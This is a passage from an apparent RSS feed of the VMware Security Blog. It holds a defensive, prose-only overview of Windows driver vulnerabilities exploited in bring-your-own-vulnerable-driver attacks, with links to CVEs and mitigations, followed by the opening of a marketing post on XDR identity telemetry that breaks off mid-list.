as a device, which is why drivers are commonly referred to as device drivers.
This differentiates them from purely software drivers which are low-level
programs that act as filters or perform some other low-level function. It is no
]]>
<![CDATA[ rmal for each device on the computer to have at least one driver. For
example, in high-performance computing, it is common to have a separate card or
piece of hardware for processing video (video card). In general, the
manufacturer of the video card will write a driver or multiple drivers, at least
]]>
<![CDATA[ one for each supported operating system. These drivers facilitate
communication between the physical device and the operating system and enable
full use of the specialized hardware. Since device drivers act as a bridge
between the operating system and physical hardware, it follows that they require
]]>
<![CDATA[ intimate access to the guarded components of the operating system that
not all applications are allowed to use. For this reason, they are an attractive
option for dishonest cyber actors whose goal is to implant undetectable,
difficult-to-remove malicious code on a system.</span><span data-ccp-props= ]]>
<![CDATA[
"{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Admittedly, this is an oversimplification but
provides a baseline for understanding the techniques that follow. For a more
complete explanation of Windows drivers see Microsoft ]]>
<![CDATA[ ’s, “</span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/what-is-a-driver-"><span
data-contrast="none">What is a driver?</span></a><span
data-contrast="auto">” </span><span
data-ccp-props="{"201341983":0,"335559739":160,"3355597
]]>
<![CDATA[ 40":259}"> </span></p> <h2 aria-level="1"><span
data-contrast="none">What makes a driver vulnerable?</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span
]]>
<![CDATA[ ></h2> <p><span data-contrast="auto">Since drivers are software, they
are susceptible to all the vulnerabilities of software in general, but the below
provides a high-level overview of the most common vulnerabilities specific to
drivers. In most cases, some combination or variation of these techniqu ]]>
<![CDATA[ es is used for driver exploitation. Like in other instances of
software exploitation, many of these constructs which are manipulated are also
required for normal use in the operation of a system, and when abused, these
same constructs can result in behaviors not intended by the original
authors.</sp ]]>
<![CDATA[ an><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Function Calls from Model Specific
Registers (MSRs)</span><span
data-ccp-props="{"134245418":true,"134245529":true,& ]]>
<![CDATA[
quot;201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><a
href="http://datasheets.chipdb.org/Intel/x86/Pentium/Embedded%20Pentium%AE%20Processor/MDELREGS.PDF"><span
data-contrast="none">Model-specific registers</span></a><span data-cont ]]>
<![CDATA[ rast="auto"> (MSRs) are a set of special-purpose data holding places
on most computer processors that are available to drivers that are used for
debugging, performance monitoring, and enabling/disabling CPU/GPU features. One
common use of these registers is to collect environmental measurements rela ]]>
<![CDATA[ ted to the driver’s hardware, for example, temperature or voltage.
These data points can be essential for the device to function properly.
</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">A close ]]>
<![CDATA[ r look at how MSRs operate reveals the problem. Within the set of MSRs
one register is of particular interest, </span><a
href="https://software.intel.com/content/www/us/en/develop/download/intel-64-and-ia-32-architectures-software-developers-manual-volume-4-model-specific-registers.html"><span
data- ]]>
<![CDATA[ contrast="none">IA32_LSTAR</span></a><span data-contrast="auto">
(IA-32e Mode System Call Target Address R/W), commonly referred to as the
shortened LSTAR. This register allows drivers to make system calls. Normal
operation dictates that the driver places the address of the system call it
wants to m ]]>
<![CDATA[ ake in the LSTAR register, and then signals for it to be called. A
system call is a function or action that triggers something to happen in the
operating system itself; these types of operations are considered privileged and
only trusted software is allowed to use them. Since drivers are trusted, th ]]>
<![CDATA[ is is not a problem. However, in the case of a basic MSR attack the
address of the system call in LSTAR is replaced with the address of the
non-trusted code. Now when the driver triggers what it thinks is a system call,
the imposter code is executed as if it were a trusted part of the operating syst
]]>
<![CDATA[ em. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Techniques that involve overwriting the LSTAR
register are no longer quite as straightforward as presented. Microsoft has
implemented security measures to make abuse more complicated, but the basics of
the technique remain the same. The difference is that it now requires multiple
exploits to place the untrusted code in memory, change LSTAR, and subsequently
trigger the system call.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Microsoft’s Mitigations </strong><br /> <a
href="https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10"><span
data-contrast="none">Supervisory Mode Execution Prevention
(SMEP)</span></a><span data-contrast="auto"> – Prevents the kernel from
executing code in user pages. </span><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/vbs-resource-protections"><span
data-contrast="none">Virtualization-Based Security (VBS)</span></a><span
data-contrast="auto"> – Restricts access to MSRs and reviews MSR events
(successor of </span><a
href="https://windows-internals.com/hyperguard-secure-kernel-patch-guard-part-1-skpg-initialization/"><span
data-contrast="none">PatchGuard</span></a><span
data-contrast="auto">)</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="none"><strong>Notable Example:</strong> </span><a
href="https://www.microsoft.com/en-us/security/blog/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/"><span
data-contrast="none">WannaCrypt</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Unprotected IOCTL
Requests</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><a
href="https://learn.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-"><span
data-contrast="none">IOCTL</span></a><span data-contrast="auto"> Requests are a
property and feature of drivers that purposefully allow untrusted or user-mode
programs to interact directly with the underlying trusted parts of a driver’s
code and subsequently the operating system. For example, when installing a new
peripheral device like a video card, there are usually multiple components. One
will be a driver for the video card itself and another will be a user interface
for tuning how video is processed and displayed. The driver is trusted, and the
user interface application is not. Out of necessity, there are predetermined
user interactions within the video card user application that can trigger events
that run code in the trusted driver. Vulnerabilities occur when the
communication between the untrusted and trusted is taken advantage of by a third
party. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Drivers that contain this type of vulnerability
share a commonality, accessible IOCTL codes or commands. IOCTL commands are
32-bit values, represented in hex (example: 0x12345678), which can be called
from untrusted parts of the operating system to execute code in the trusted
part. These commands are </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/defining-i-o-control-codes"><span
data-contrast="none">defined by the author of the driver</span></a><span
data-contrast="auto"> and can execute the most protected operating system calls.
For example, a video card application can send hardware configuration changes to
increase how quickly data is processed. To accomplish this the untrusted user
application must be able to communicate with the video card itself. This is
possible because the driver contains a predefined </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/creating-ioctl-requests-in-drivers"><span
data-contrast="none">IOCTL Request</span></a><span data-contrast="auto"> that
the user application can issue to it. The order of events is, the OS video card
application connects to the device driver, sometimes authenticates itself, and
sends the command along with any compulsory data (the new settings).
Vulnerabilities arise when access to these IOCTL operations is not adequately
restricted.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">One example of this type of vulnerability is when
an unsecured IOCTL Request can perform arbitrary memory writes. For example,
there are IOCTL Requests that result in calls to </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-mmmapiospace"><span
data-contrast="none">MmMapIOSpace</span></a><span data-contrast="auto">, which
maps physical to virtual addresses. Two examples of this are </span><a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15368"><span
data-contrast="none">CVE-2020-15368</span></a><span data-contrast="auto"> and
</span><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15481"><span
data-contrast="none">CVE-2020-15481</span></a><span data-contrast="auto">, in
both cases unprotected IOCTL commands result in the ability to run untrusted
code by writing it directly to arbitrary physical memory.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">The scope of </span><a
href="https://cwe.mitre.org/data/definitions/782.html"><span
data-contrast="none">IOCTL Request vulnerabilities</span></a><span
data-contrast="auto"> is much larger and goes beyond writing to arbitrary memory
and extends to almost any operation available in the operating system. What bad
actors can accomplish with this type of vulnerability is completely dependent on
what the driver has defined in IOCTLs, and how security is implemented to
prevent unintended use. For this reason, this type of vulnerability is
particularly troubling and difficult to defend against, and in an unscientific
randomized sampling of vulnerable drivers, it was also the most
common. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Microsoft’s Mitigations</strong><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/security-issues-for-i-o-control-codes"><span
data-contrast="none">Security Recommendations for I/O Control
Codes</span></a><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/applying-security-descriptors-on-the-device-object"><span
data-contrast="none">Applying Security Descriptors on the Device
Object</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Notable Examples</strong><br /> <a
href="https://asec.ahnlab.com/wp-content/uploads/2022/10/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Oct-05-2022-3.pdf"><span
data-contrast="none">Lazarus Group’s Rootkit</span></a><br /> <a
href="https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"><span
data-contrast="none">InvisiMole</span></a><br /> <a
href="https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf"><span
data-contrast="none">Slingshot</span></a><br /> <a
href="https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/"><span
data-contrast="none">BlackByte</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Plug-and-Play Driver
Vulnerabilities</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">It is great when things “just work,” which is
probably why Windows introduced </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-plug-and-play"><span
data-contrast="none">Plugin and Play (PnP)</span></a><span data-contrast="none">
device drivers</span><span data-contrast="auto">. This feature of Windows allows
the operating system to seamlessly adjust to hardware changes with minimal user
interaction. A common example where this comes into play is when a peripheral
device like a keyboard is plugged into a computer while Windows is already
running. Windows recognizes the new hardware and, in most cases, makes it
available for use very quickly. This ease of use can lead to a false sense of
security. PnP drivers are still drivers and susceptible to all the
vulnerabilities discussed and unfortunately more. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">The convenience that PnP offers is delivered by
</span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/pnp-components"><span
data-contrast="none">additional software layers</span></a><span
data-contrast="auto"> in both trusted and untrusted parts of the operating
system. These allow Windows to recognize hardware changes, allocate memory on
behalf of a device, load a driver, and provide some basic components needed by
most drivers. To seamlessly install a PnP device, the OS must grant some level
of trust to it at some point during the installation, and this is where most PnP
vulnerabilities arise and lead to privilege escalation.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">From an attacker’s perspective, PnP drivers are
beneficial because they can be loaded and unloaded from untrusted user mode with
no user interaction. Additionally, you may think this type of vulnerability
requires physical access, but this is not the case. </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil"><span
data-contrast="none">Physical access is not required</span></a><span
data-contrast="auto">. Generally, vulnerabilities in PnP device drivers provide
privilege escalation, which opens the door for other attacks.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Note: PnP Drivers should not be confused with
</span><a
href="https://learn.microsoft.com/en-us/windows/win32/upnp/overview-of-universal-plug-and-play"><span
data-contrast="none">UPnP (Universal Plug and Play)</span></a><span
data-contrast="auto">, which is a protocol for dynamic network device
discovery.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p aria-level="3"><strong>Possible Mitigation </strong><br /> <a
href="https://www.bleepingcomputer.com/news/microsoft/how-to-block-windows-plug-and-play-auto-installing-insecure-apps/"><span
data-contrast="none">DisableCoInstallers Registry Key</span></a><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":40,"335559739":0,"335559740":259}"> </span></p>
<p aria-level="3"><strong>Notable Example</strong><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":40,"335559739":0,"335559740":259}"> </span></p>
<p><a
href="https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/"><span
data-contrast="none">PnP Mouse Privilege Escalation</span></a><br /> <a
href="https://windows-internals.com/printdemon-cve-2020-1048/"><span
data-contrast="none">CVE-2020-1048</span></a><span data-contrast="auto"> – Print
Spooler</span><br /> <a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675"><span
data-contrast="none">CVE-2021-1675</span></a><span data-contrast="auto">,
</span><a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527"><span
data-contrast="none">CVE-2021-34527</span></a><span data-contrast="auto">
– Print Nightmare</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Firmware Update
Vulnerabilities</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">The introduction provided a definition of a driver
and explained the difference between a device driver, which provides hardware-OS
communication, and a software driver, which acts more like a filter for the
device drivers. There is another type of driver called a </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/system-and-device-firmware-updates-via-a-firmware-driver-package"><span
data-contrast="none">firmware driver</span></a><span data-contrast="auto">. Like
a device driver it is for a single device, but instead of residing in and
facilitating communication with the operating system; it provides instructions
to be stored on the hardware itself. This includes all the definitions and the
logic necessary for the hardware to operate. Firmware drivers are used to load
code onto a specialized chip located on the hardware itself. This code is
usually placed there by the manufacturer, and for the most part, is not meant to
be changed. For this reason, it is good security practice for the firmware to be
write-protected, however, sometimes a situation arises where an update is
required. This could be a logic error or other oversight that leaves </span><a
href="https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/"><span
data-contrast="none">firmware vulnerable to malicious actors</span></a><span
data-contrast="auto">.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Firmware update vulnerabilities do not usually
occur in the firmware driver itself but in the lack of access control dictating
its use. In malicious firmware updates the firmware driver replaces the
manufacturer-approved code for performing logic on the actual hardware with
nontrusted code, and once complete is close to undetectable. While this type of
vulnerability is certainly found on Windows devices, most notably printers. It
is far more prevalent on IoT (Internet of Things) devices. IoT devices consist
of non-traditional end-user systems that are connected to the internet, for
example, cameras, lightbulbs, thermostats, kitchen appliances, and
more.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Microsoft Mitigation</strong><br /> <a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/firmware-attack-surface-reduction"><span
data-contrast="none">Firmware Attack Surface Reduction (FASR)</span></a><br />
<a
href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/updating-device-firmware-using-windows-update"><span
data-contrast="none">Update device firmware using Windows Update</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Notable example</strong><br /> <a
href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-21134"><span
data-contrast="none">CVE-2022-21134</span></a><br /> <a
href="https://www.csoonline.com/article/3642988/new-hp-mfp-vulnerabilities-show-why-you-should-update-and-isolate-printers.html"><span
data-contrast="none">FutureSmart Printer Firmware</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">UEFI and Boot Loader
Vulnerabilities</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">UEFI (Unified Extensible Firmware Interface) is
the modern version of BIOS (Basic Input/Output System), both of which enable a
computer’s hardware to boot the operating system. One benefit of UEFI over BIOS
is that it provides the option for secure boot, which introduced a security
feature that </span><a
href="https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/windows-secure-boot-key-creation-and-management-guidance?view=windows-11"><span
data-contrast="none">ensures the integrity of code</span></a><span
data-contrast="auto"> before it executes. UEFI secure boot should only allow
code with valid credentials to run by enforcing authenticity through PKI (Public
Key Infrastructure) and Certificates. For this reason, the UEFI class of driver
vulnerability usually involves disabling or bypassing secure boot to run
unendorsed code. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">UEFI attacks are possible even when the firmware
is not left unprotected. VMware Carbon Black’s own Takahiro Haruyama has done
extensive research into this type of attack, see his blog post, “</span><a
href="https://blogs.vmware.com/security/2021/06/detecting-uefi-bootkits-in-the-wild-part-1.html"><span
data-contrast="none">Detecting UEFI Bookits in the Wild</span></a><span
data-contrast="auto">.”</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p aria-level="3"><strong>Microsoft Mitigation</strong><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":40,"335559739":0,"335559740":259}"> </span></p>
<p><a
href="https://learn.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process"><span
data-contrast="none">Secure the Windows boot process</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong>Notable Example</strong><br /> <span data-contrast="auto">From ESET
– </span><a
href="https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/"><span
data-contrast="none">When “secure” isn’t secure at all: High</span><span
data-contrast="none">‑</span><span data-contrast="none">impact UEFI
vulnerabilities discovered in Lenovo consumer laptops</span></a><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Conclusion</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">This has been an introduction to driver
vulnerabilities and is not meant to be all-encompassing of all possible driver
vulnerabilities. For example, there are additional MSR manipulation
vulnerabilities, which could have been covered but were left out. These involve
manipulating MSR register values, however, the depth of understanding of MSR
registers needed to make a section like that easily comprehensible went beyond
the scope of this brief introduction. Additionally, Microsoft’s
virtualization-based security has made MSR attacks far less prevalent.
</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Network security professionals everywhere spend an
untold number of hours working to patch vulnerabilities in their networks as
they are discovered. This is a monumental task considering the amount of
hardware and software on modern systems. It is no wonder, given all the hours of
demanding work devoted to this when an actor brings their own vulnerable driver
into a fully patched network, security professionals cringe. Not to mention that
many of these so-called vulnerable drivers are signed; why are they not safe?
This overview of driver vulnerabilities has attempted to provide some insight
into this question and provide additional resources to further enrich one’s own
knowledge of the topic. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Protections</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contrast="auto">Carbon Black offers multiple out-of-the-box
protections against Bring Your Own Vulnerable Driver attacks. The simplest
method of protection provided is alerting on or prohibiting known abused drivers
in a network. As soon as a vulnerable driver is disclosed, it is added to a
known malware list independent of the validity of the file signature. Secondly,
a universal requirement of BYOVD attacks is that the vulnerable driver must be
installed in the operating system. In the case of BYOVD attacks, the steps
required to move the vulnerable driver to the targeted system and then install
it are very similar to well-known cyber-attack chains.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">One strength of the Carbon Black line of products
is the unparalleled ability to identify, alert, and block cyber-attack chains.
Additionally, it’s endpoint software tracks applications that load data or
code into memory, which includes drivers, so any driver loaded into memory will
result in an alert or potential block depending on the policy. Finally, Carbon
Black products have the capacity to alert on or block the installation of
drivers by unknown applications, which stops BYOVD attacks before they progress.
All of these individual protections work together to provide a comprehensive
defensive strategy that guards against malware even when it uses signed
drivers.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html">Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In</a> appeared first on
<a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>XDR: Identity Matters – Who You Know is As Important as What You
Know</title>
<link>https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know</link>
<dc:creator>
<![CDATA[ Justin Falck ]]>
...
</dc:creator>
<pubDate>Tue, 18 Apr 2023 15:00:02 +0000</pubDate>
<category>
<![CDATA[ Endpoint Security ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83441</guid>
<description>
<![CDATA[ <div><img width="300" height="190"
src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png
300w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png
768w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png
2048w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png
600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Endpoint security is
recognizably an essential part of modern cybersecurity, and endpoint security
tools are in many cases a first and last line of defense. Endpoint security is
focused on securing servers, workloads, end-user workstations, laptops, and any
other devices that are used to access corporate networks and SaaS
applications. Generally, endpoint security is regarded … <a
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR:
Identity Matters – Who You Know is As Important as What You Know</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="190"
src="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-300x190.png
300w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1024x650.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-768x488.png
768w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-1536x975.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-2048x1300.png
2048w,
https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png
600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">Endpoint security is recognizably an essential part of
modern cybersecurity, and endpoint security tools are in many cases a first and
last line of defense. Endpoint security is focused on securing servers,
workloads, end-user workstations, laptops, and any other devices that are used
to access corporate networks and SaaS applications. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Generally, endpoint security is regarded as a
mature market and well-understood discipline; defend against malware and
non-malware-based attacks (Next Generation Antivirus – NGAV), monitor and
manage the baseline security state and vulnerabilities of the endpoint, manage
the endpoint host-based firewall (HBFW), and detect and respond to attacks
(Endpoint Detection and Response – EDR). These are all well understood and
in Carbon Black’s case, all disciplines we excel at and deliver through our
platform, VMware Carbon Black Cloud.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">The reality however is that threat actors continue
to adapt and evolve to evade security tools, and so security tools and processes
must also evolve to meet them. </span><b><span data-contrast="auto">This is the
driving force behind VMware Carbon Black’s evolution of EDR into extended
detection and response (XDR) – ensuring that we continue to empower users and
partners to stay ahead of the latest threats.</span></b><span
data-contrast="auto"> </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Put simply, XDR is the natural evolution of EDR.
XDR adds additional telemetry types, such as identity and network, to the
</span><i><span data-contrast="auto">existing</span></i> <i><span
data-contrast="auto">process-related</span></i><span data-contrast="auto">
telemetry we have always delivered with EDR. Additional telemetry types increase
signal fidelity and provide additional means to detect suspicious activity,
reducing the mean time to detect and respond (MTTD/MTTR). With </span><a
href="https://www.vmware.com/solutions/xdr-security.html"><span
data-contrast="none">VMware Carbon Black XDR</span></a><span
data-contrast="auto"> we natively collect and analyze identity, network, and EDR
telemetry, all without requiring changes to the network configuration or the
installation of additional software or hardware.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">EDR, network, and identity telemetry are all equal
pillars of XDR, but for this blog I want to focus on why identity is so
important as the network pillar will be expanded on in a future blog
post. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">To stay ahead of the attacker, it is essential to
have a clear view of </span><i><span data-contrast="auto">who</span></i><span
data-contrast="auto"> is accessing the network, from where, and on which device.
This statement addresses the reality that a significant number of attacks
involve the creation of new user accounts or identities, account takeover, and
privilege escalation, and this is where user authentication visibility comes
in. </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">Carbon Black Cloud is now able to collect events
associated with a broad range of identity intelligence or user authentication
activity including logon/logoffs, failed logins, account lockouts, privilege
assignments, etc. This capability provides critical insights into who is
accessing the network, from which device, and from where. We collect this
telemetry, index it, and make it searchable in the same Carbon Black Cloud
console customers are using today to search process (and network) telemetry.
The output of the combined telemetry from Carbon Black Cloud is invaluable for
detecting and preventing attacks by malicious actors who may use stolen or
compromised credentials to gain access to sensitive data or systems.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">There are many benefits of combining user
authentication visibility with endpoint security:</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><b><span
data-contrast="auto">Early detection of suspicious activity:</span></b><span
data-contrast="auto"> By monitoring user authentication, endpoint security
platforms can detect suspicious login attempts or unusual activity on the
network. This information can be used to trigger alerts and prompt security
teams to investigate potential threats early before they have a chance to cause
significant damage.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><b><span
data-contrast="auto">Improved incident response:</span></b><span
data-contrast="auto"> User authentication visibility can also provide critical
information in the event of a security incident. By knowing who was logged in at
the time of an incident, security teams can quickly identify potential sources
of the problem and take appropriate action to contain and mitigate the
impact.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><b><span
data-contrast="auto">Enhanced compliance:</span></b><span data-contrast="auto">
Many compliance regulations require organizations to track and monitor user
access to sensitive data and systems. User authentication visibility can help
organizations meet these requirements and avoid costly penalties for
non-compliance.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Symbol","469769242":[8226],"469777803":"left","469777804":"","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><b><span
